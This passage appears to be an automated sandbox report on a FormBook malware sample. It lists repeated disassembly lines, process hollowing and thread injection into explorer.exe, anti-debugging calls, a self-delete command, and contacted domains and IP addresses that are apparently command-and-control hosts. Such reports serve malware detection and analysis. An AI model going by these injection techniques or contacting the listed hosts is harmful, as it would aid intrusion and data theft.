          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A42D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AF8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A53D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ACA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A74D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A83D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AF3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A67D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AFFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A88EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AFFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A78E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A57E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B0AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A58794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A44F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A44F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A440E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A60050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A60050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B049A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AD41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A64120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A49100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A4B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.aksharnewtown.com
          Source: C:\Windows\explorer.exeDomain query: www.stacksyspro.net
          Source: C:\Windows\explorer.exeDomain query: www.th0rgramm.com
          Source: C:\Windows\explorer.exeDomain query: www.yakudatsu-hikaku.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--ol-xia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.95.215 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.236.136.12 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeDomain query: www.investmentpartners.limited
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.50.167 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.86.176.10 80
          Source: C:\Windows\explorer.exeDomain query: www.rainbowsdepot.com
          Source: C:\Windows\explorer.exeDomain query: www.tonton-koubou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.185.226 80
          Source: C:\Windows\explorer.exeDomain query: www.recovatek.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.37.16 80
          Source: C:\Windows\explorer.exeDomain query: www.jabberjawmobile.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.formula-kuhni.com
          Source: C:\Windows\explorer.exeDomain query: www.alliedcds.com
          Source: C:\Windows\explorer.exeDomain query: www.selectenergyservicestx.com
          Source: C:\Windows\explorer.exeDomain query: www.ugonget.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Users\user\Desktop\4oItdZkNOZ.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 240000
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: explorer.exe, 00000002.00000000.359917632.0000000004F80000.00000004.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.603385565.00000000008B8000.00000004.00000020.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.351192750.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000002.00000000.351192750.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000003.00000002.604223795.00000000032D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery241Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
